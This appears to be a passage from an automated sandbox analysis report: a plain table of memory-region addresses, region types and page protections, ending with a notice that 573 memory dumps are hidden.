|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
573A000
|
trusted library allocation
|
page read and write
|
||
|
26FB0000
|
heap
|
page execute and read and write
|
||
|
27931000
|
trusted library allocation
|
page read and write
|
||
|
83E0000
|
direct allocation
|
page execute and read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
24B60000
|
trusted library allocation
|
page read and write
|
||
|
591000
|
heap
|
page read and write
|
||
|
693E000
|
stack
|
page read and write
|
||
|
45D0000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
27960000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
heap
|
page read and write
|
||
|
45F0000
|
trusted library allocation
|
page read and write
|
||
|
27950000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
24B92000
|
trusted library allocation
|
page read and write
|
||
|
70CF000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
24250000
|
direct allocation
|
page read and write
|
||
|
246DB000
|
stack
|
page read and write
|
||
|
522000
|
unkown
|
page read and write
|
||
|
24BE1000
|
trusted library allocation
|
page read and write
|
||
|
24BAD000
|
trusted library allocation
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
4590000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
683F000
|
stack
|
page read and write
|
||
|
279A0000
|
trusted library allocation
|
page read and write
|
||
|
24AAE000
|
stack
|
page read and write
|
||
|
9D5000
|
heap
|
page read and write
|
||
|
26BF1000
|
heap
|
page read and write
|
||
|
877000
|
heap
|
page read and write
|
||
|
7F260000
|
trusted library allocation
|
page execute and read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
27941000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
367000
|
trusted library allocation
|
page execute and read and write
|
||
|
26FD5000
|
heap
|
page read and write
|
||
|
24AB0000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
5879000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
81ED000
|
heap
|
page read and write
|
||
|
45A4000
|
trusted library allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
333000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BA1000
|
trusted library allocation
|
page read and write
|
||
|
BE7B000
|
direct allocation
|
page execute and read and write
|
||
|
26FA0000
|
remote allocation
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
816F000
|
heap
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
270A7000
|
heap
|
page read and write
|
||
|
2740000
|
heap
|
page read and write
|
||
|
8132000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27980000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
80AC000
|
stack
|
page read and write
|
||
|
27092000
|
heap
|
page read and write
|
||
|
26FCD000
|
heap
|
page read and write
|
||
|
6ED1000
|
heap
|
page read and write
|
||
|
27960000
|
trusted library allocation
|
page read and write
|
||
|
27990000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
direct allocation
|
page read and write
|
||
|
27970000
|
trusted library allocation
|
page read and write
|
||
|
2465F000
|
stack
|
page read and write
|
||
|
519000
|
unkown
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
819D000
|
heap
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
26BE0000
|
trusted library allocation
|
page read and write
|
||
|
4BC000
|
unkown
|
page readonly
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
7170000
|
heap
|
page execute and read and write
|
||
|
356000
|
trusted library allocation
|
page execute and read and write
|
||
|
370000
|
trusted library allocation
|
page execute and read and write
|
||
|
48EB000
|
remote allocation
|
page execute and read and write
|
||
|
3DC0000
|
remote allocation
|
page execute and read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
27960000
|
trusted library allocation
|
page read and write
|
||
|
297E000
|
heap
|
page read and write
|
||
|
24999000
|
stack
|
page read and write
|
||
|
24200000
|
direct allocation
|
page read and write
|
||
|
7007000
|
heap
|
page read and write
|
||
|
6990000
|
direct allocation
|
page read and write
|
||
|
24B70000
|
trusted library allocation
|
page read and write
|
||
|
AAEE000
|
stack
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
8188000
|
heap
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
27C10000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
unkown
|
page write copy
|
||
|
494000
|
unkown
|
page readonly
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
4826000
|
trusted library allocation
|
page read and write
|
||
|
5CEB000
|
remote allocation
|
page execute and read and write
|
||
|
B2D000
|
stack
|
page read and write
|
||
|
28B0000
|
direct allocation
|
page read and write
|
||
|
4B9000
|
unkown
|
page readonly
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
AA7B000
|
direct allocation
|
page execute and read and write
|
||
|
67B5000
|
heap
|
page execute and read and write
|
||
|
6750000
|
trusted library allocation
|
page execute and read and write
|
||
|
409000
|
unkown
|
page readonly
|
||
|
400000
|
unkown
|
page readonly
|
||
|
27A80000
|
trusted library allocation
|
page read and write
|
||
|
27370000
|
trusted library allocation
|
page read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
3EEB000
|
remote allocation
|
page execute and read and write
|
||
|
27930000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
trusted library section
|
page read and write
|
||
|
27960000
|
trusted library allocation
|
page read and write
|
||
|
670C000
|
stack
|
page read and write
|
||
|
27BFE000
|
stack
|
page read and write
|
||
|
4580000
|
trusted library section
|
page read and write
|
||
|
7AEB000
|
remote allocation
|
page execute and read and write
|
||
|
25C41000
|
trusted library allocation
|
page read and write
|
||
|
278F000
|
stack
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
2725E000
|
stack
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
27A90000
|
trusted library allocation
|
page read and write
|
||
|
26E0C000
|
stack
|
page read and write
|
||
|
27940000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
heap
|
page readonly
|
||
|
2475E000
|
stack
|
page read and write
|
There are 573 hidden memdumps, click here to show them.